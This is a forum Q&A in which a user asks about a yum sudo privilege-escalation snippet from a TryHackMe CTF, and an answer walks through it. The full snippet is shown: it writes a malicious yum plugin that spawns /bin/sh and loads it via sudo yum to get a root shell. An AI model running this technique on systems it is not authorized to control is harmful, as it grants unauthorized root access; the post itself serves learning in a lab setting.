Yum privilege escalation

Question

I found this piece of code while doing some ctf on tryhackme. And I don't understand it. Can somebody explain me what exactly it does?

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

Answer 1

Of course, this privilege escalation technique obviously makes use of the user privilege to run yum as sudo.

TF=$(mktemp -d) creates a temporary directory.

Afterwards, three files are created inside the temp directory (accessible through $TF) by "catting" content into them.

To visualize this, you can run the following commands in a bash shell (without leading > of course):

> touch test

> cat >test<<EOF 
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

> cat test

This will print out the just "catted" content inside the file called test.

The last step: sudo yum -c $TF/x --enableplugin=y simply executes a regular yum command, making use of the just created files mentioned above. The payload def init_hook(conduit): os.execl('/bin/sh','/bin/sh') will then be executed giving you a shell as root since you execute it with sudo.

I hope this is helpful.